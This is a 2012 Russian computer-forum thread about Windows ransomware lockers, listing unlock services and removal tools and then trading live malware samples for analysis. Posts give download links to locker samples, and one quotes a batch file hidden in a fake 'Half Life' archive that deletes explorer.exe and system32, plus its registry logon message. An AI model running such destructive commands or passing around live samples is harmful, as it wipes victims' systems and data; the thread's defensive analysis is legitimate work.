Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Операционные системы » Microsoft Windows » Windows заблокирован!

Модерирует : KLASS, IFkO

KLASS (19-02-2017 09:58): Продолжение в Windows заблокирован! (II)  Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172

   

berta0

Newbie
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Сервисы деактивации вымогателей-блокеров:
 
http://www.drweb.com/unlocker/index/
http://www.esetnod32.ru/.support/winlock/
http://virusinfo.info/deblocker/
http://support.kaspersky.ru/viruses/deblocker
http://news.drweb.com/show/?i=304&c=9&p=0
http://www.drweb.com/unlocker/mobile/
http://forum.drweb.com/index.php?showtopic=287460
 

Цитата:
Для получения кода разблокировки вам необходимо указать:
- номер телефона, на который вам предлагают отправить СМС;  
- текст сообщения, которое требуют отправить на этот номер.

 
 
Если не работает сеть/интернет после удаления вируса
Как убрать окно вируса в фон
Средства для борьбы с этими вирусами
Метод запуска браузера от Гостя
Получение кода разблокировки по телефону и жалоба на короткий номер с просьбой отправить смс
Видео, демонстрирующее заражение системы Винлоком


Вирус(ы) в Windows XP,Vista,7. Проблемы. Решения.


Инструменты:
 
  Universal Virus Sniffer -краткая инструкция- (uVS предназначен для упрощения процесса борьбы с неизвестными вирусами/троянами/руткитами как непосредственно в заражённом Windows, так и для лечения неактивных и удалённых систем).
  Антивирусная утилита AVZ (помогает исправить последствия деятельности зловредов).
  Метод от tahirg (Загрузочный ERD Commander).
  Метод от folta Хитрость с клавишей Shift
  Bootice Работа с MBR и различными файлами для загрузки OS.
  Kaspersky WindowsUnlocker (LiveCD Kaspersky Rescue Disk).
  AntiWinLockerLiveCD Специальный LiveCD для разблокировки.
  new! AntiSMS Быстрая автоматическая разблокировка компьютера, загрузочный диск - 30 МБ.
 
 


  Чистые системные файлы Windows, которые заражают блокеры: скачать

Всего записей: 16 | Зарегистр. 07-03-2009 | Отправлено: 14:46 08-04-2009 | Исправлено: Nilslis, 17:16 13-02-2016
IvANANvI

Advanced Member
Редактировать | Профиль | Сообщение | ICQ | Цитировать | Сообщить модератору

olzaruta (23:47 18-02-2012)
Цитата:
-...посмейтесь  

Самое главное, что запрос всего 30 р. Пионерам на пивко.
 

Всего записей: 762 | Зарегистр. 29-11-2007 | Отправлено: 11:57 19-02-2012
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
olzaruta

Цитата:
могу выложить

С удовольствием посмотрел бы... опыт лишним не бывает

Всего записей: 11118 | Зарегистр. 12-10-2001 | Отправлено: 12:11 19-02-2012
olzaruta



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
- Ну что же....продолжим.....для разминки вначале
- Ищем в сети пароли на платные сайты....находим....пароль_2.exe
- Качаем: http://zalil.ru/32734710 пароль прежний...
- Запускаем....получаем: http://i32.fastpic.ru/big/2012/0219/ce/fa84574703eae604c0d4ee12e563b6ce.jpg
- Развлекайтесь...а то все про пионерию пишут....хорошие были времена..веселые...
- Это шифровщик.....если не ошибаюсь код разблокировки: hf8374-sf3gv-dfgt3g-343g2-vbbrt-34rgd-se4gbb-4534v
- ....но может и ошибаюсь...
-...можно и в ручную поколдовать....
- ..продолжение следует.....

Всего записей: 317 | Зарегистр. 15-01-2012 | Отправлено: 12:19 19-02-2012 | Исправлено: olzaruta, 12:43 19-02-2012
Varnavara



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
olzaruta
Спасибо, интересно конечно, ну а я не рискну-опыта маловато.

Всего записей: 34 | Зарегистр. 28-03-2007 | Отправлено: 12:25 19-02-2012
olzaruta



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Varnavara


Цитата:
Спасибо, интересно конечно, ну а я не рискну-опыта маловато.

 

Всего записей: 317 | Зарегистр. 15-01-2012 | Отправлено: 12:28 19-02-2012
nikhelfer

Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
На прошлой неделе был такой кейс. Блокиратор срабатывал только при наличии сети про загрузке Windows. Если же сети не было, то можно было спокойно работать, т.к. блокиратор себя ничем не проявлял. Система - семерка, пользователь - ограниченный. В профиле пользователя в каталоге Temp находился файл ms0config32.exe, после удаления которого система работала и в сети.

Всего записей: 193 | Зарегистр. 16-08-2003 | Отправлено: 12:47 19-02-2012
olzaruta



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
nikhelfer

 
файлик ms0config32.exe дайте....протестим...разберем по винтикам....

Всего записей: 317 | Зарегистр. 15-01-2012 | Отправлено: 12:51 19-02-2012
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
olzaruta

Цитата:
Качаем:

Писатели "перестарались"... на столе файл лежит "Как расшифровать файлы.txt", а прочесть его нечем, все похерено, в том числе и по сети ... и, если я на приведенной выше картинке нажал ОК, то куда деньги "слать" неизвестно. Это под админом, а под юзером все херится только по сети. Где то я уже встречал подобную игрушку.
На всякий напомню, кто в виртуалке будет пробовать не расшаривайте больше одной, тестовой папки на хосте, иначе все снесет.

Всего записей: 11118 | Зарегистр. 12-10-2001 | Отправлено: 13:07 19-02-2012
olzaruta



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
- Следующий случай опять из истории поиска халявного софта...
- Совсем свеженький пионерский..в автозагрузку не прыгает..в реестре прописан не стандартно как все...
- Скрин на моей машине: http://i28.fastpic.ru/big/2012/0219/08/b7cd78446f7d1365ac7a114538d13908.jpg
- Я снял его программой prkiller142 за 2 сек, но можно и AnVir Task Manager..и тд.
- При нажатии клавиш WIN + M баннер сворачивается на панель задач..а тут вам поле действий с реестром и файлами.....
- Этот так называемый баннер я вскрыл прогой 7 zip...где так же можно посмотреть ветку реестра куда он прописан и найти код дезактивации...
- Открываем баннер внутри 7 zip http://i30.fastpic.ru/big/2012/0219/2d/813509004de42f609373281141f1ee2d.jpg
- Вот вам ветка реестра  http://i29.fastpic.ru/big/2012/0219/9c/82d5707f4447f09f82d78cbcf1fdcf9c.jpg
-.... а вот и код разблокировки   http://i27.fastpic.ru/big/2012/0219/63/73e8a99584bb64858919aa22a5ef4463.jpg
- ..а вот сам файл http://zalil.ru/32734962
 
 
Добавлено:

Цитата:
то куда деньги "слать" неизвестно

 
Почему неизвестно? На скрине четко виден номер телефона..и сумма прописана!

Всего записей: 317 | Зарегистр. 15-01-2012 | Отправлено: 13:09 19-02-2012 | Исправлено: olzaruta, 13:35 19-02-2012
ua3vui

Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
olzaruta

Цитата:
Скрин на моей машине: http://i28.fastpic.ru/big/2012/0219/08/b7cd78446f7d1365ac7a114538d13908.jpg

Там даже слово купюропрЕемник есть...А уж про лицИвой счет я молчу вообще. Школота...

Всего записей: 3605 | Зарегистр. 16-04-2008 | Отправлено: 13:44 19-02-2012
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Открываем баннер внутри 7 zip

Total Commander по Ctrl+PageDown тоже открывает

Цитата:
а вот и код разблокировки

А как его там находить в такой куче мусора без отладчика?

Цитата:
На скрине четко виден номер телефона

Так я ж говорю, кнопку ОК нажал и все... нету телефона... перестарались.

Всего записей: 11118 | Зарегистр. 12-10-2001 | Отправлено: 13:52 19-02-2012
olzaruta



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
- И из этой же оперы..про поиск Black_Admin для игры в как это...Counter-strike ...
- Нашли и качнули...  http://i28.fastpic.ru/big/2012/0219/95/be3196b43c1ad0ec4239ed10a4b3ee95.jpg
-..а так же запустили....получили....  http://i32.fastpic.ru/big/2012/0219/11/d0d6444d268fd9a6d5d5eefb86830d11.jpg
-..тут уже полнейший наглеж...да же id указан....я к нему ВКонтакт залез...так он школу только в 2016 году заканчивает...
- ...файл для теста http://zalil.ru/32735221 пароль 2012
 
Добавлено:

Цитата:
KLASS

 
- С вашими доводами...согласен!

Всего записей: 317 | Зарегистр. 15-01-2012 | Отправлено: 13:58 19-02-2012
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Последний локер обойти можно входом в другого пользователя с вытекающими.

Всего записей: 11118 | Зарегистр. 12-10-2001 | Отправлено: 14:25 19-02-2012
Varnavara



Junior Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
olzaruta
Смеетесь? Я поняла, не туда влезла, не на то замахнулась. Согласна

Всего записей: 34 | Зарегистр. 28-03-2007 | Отправлено: 14:57 19-02-2012
olzaruta



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
- Ну что же...разминка закончена....пионеры отдыхают...
- Перейдем к боевым действиям...
- Есть такая игра Half-Life....наверное в нее играли и играют не только дети но и взрослые...не так ли?
- Так вот....как я и писал ранее...многие ищут в сети ..трейлер  и тд. для облегчения прохождения игры...а находят...убийцу винды....
- ...и скачивают очень интересный файлик Haif Life.exe.....
- это самораспаковывающийся архив!  
- так же с помощью 7-ZIP я вскрыл этот архив и то, что я там увидел...
- ... там лежат два файла: help.bat и restore.reg. Что это за файлы - видно по расширениям.
- Так вот, в help.bat есть такие строчки:
**** del /f /s /q %systemroot%\explorer.exe
****del /f /s /q %systemroot%\system32\*.*
**** - это завуалировано, от греха подальше, ну а суть я думаю понятна...
- Этого уже достаточно, чтобы "убить" систему, но killer пошёл дальше. Есть ещё файл с расширением .reg. Там ещё веселее!!!
- Не буду всего описывать, приведу всего одну строчку (это прочитает потерпевший на своём мониторе после того, как запустит "игрушку" Half Life !!!
[HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon] "LegalNoticeCaption"="У вас сегодня неудачный день!" "LegalNoticeText"="Извините, но я убил Вашу операционную систему! Прощайте! "
- файл http://zalil.ru/32735531 пароль тут не выложу.....пишите в ЛС

Всего записей: 317 | Зарегистр. 15-01-2012 | Отправлено: 14:59 19-02-2012
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
olzaruta
Было уже нечто подобное, это даже не вирь, скорее, подлянка. А систему убить можно одной командой из батника, если сидим под админом.

Всего записей: 11118 | Зарегистр. 12-10-2001 | Отправлено: 15:16 19-02-2012
olzaruta



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Было уже нечто подобное, это даже не вирь, скорее, подлянка. А систему убить можно одной командой из батника, если сидим под админом.

 
- Согласен, но батник только систему снесет....и этот HL....для спеца в принципе не очень страшен.......затягиваешь ветку реестра от рабочей винды и делаешь проверку на жизненно важные системные файлы которые повреждены, автоматом восстанавливаются опля , на все ушло ровно 3мин. 40сек
- Но у меня есть еще на закуску..очень интересный файлик с расширением htm...так вот...при запуске он не только грохает винду, но и удаляет все данные со всех жестких дисков....вот так......а тут про пионерию говорят
- Ну вот, надеюсь мы оживили форум

Всего записей: 317 | Зарегистр. 15-01-2012 | Отправлено: 15:41 19-02-2012 | Исправлено: olzaruta, 16:04 19-02-2012
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Но у меня есть еще на закуску..очень интересный файлик с расширением htm

Давай посмотрим...

Всего записей: 11118 | Зарегистр. 12-10-2001 | Отправлено: 15:46 19-02-2012
olzaruta



Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Давай посмотрим...

 
- Можно....но не сегодня

Всего записей: 317 | Зарегистр. 15-01-2012 | Отправлено: 15:59 19-02-2012
1Kipovec



Advanced Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
olzaruta
во, вот цэ дило. А то всякую "муть дешовую" "надоело" отлавливать, хотЦа что и посерьёзней "пожамкать".
 

Цитата:
Давай посмотрим...

Присоединяюсь!!!
 

Цитата:
ms0config32.exe

попадался на ХР, но не чем себя "не проявлял", ясно вирустотал - молчёк. Отправил на Авиру, тож молча, НО намедне жена "перепутала" флехи и вставив в комп мою (с телом) авира - типавирь, а поскольку я её приучил, если визжит что вирь - удалить, вот и нету тела.

----------
"ГрОмАтеям" нефиг поучать. Мои ошибки, ЭТО МОИ ошибки. Т.Е. Эксклюзив. Следите луче за своим трёпом.
nick-name.ru

Всего записей: 641 | Зарегистр. 24-08-2009 | Отправлено: 16:15 19-02-2012
   

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172

Компьютерный форум Ru.Board » Операционные системы » Microsoft Windows » Windows заблокирован!
KLASS (19-02-2017 09:58): Продолжение в Windows заблокирован! (II)


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru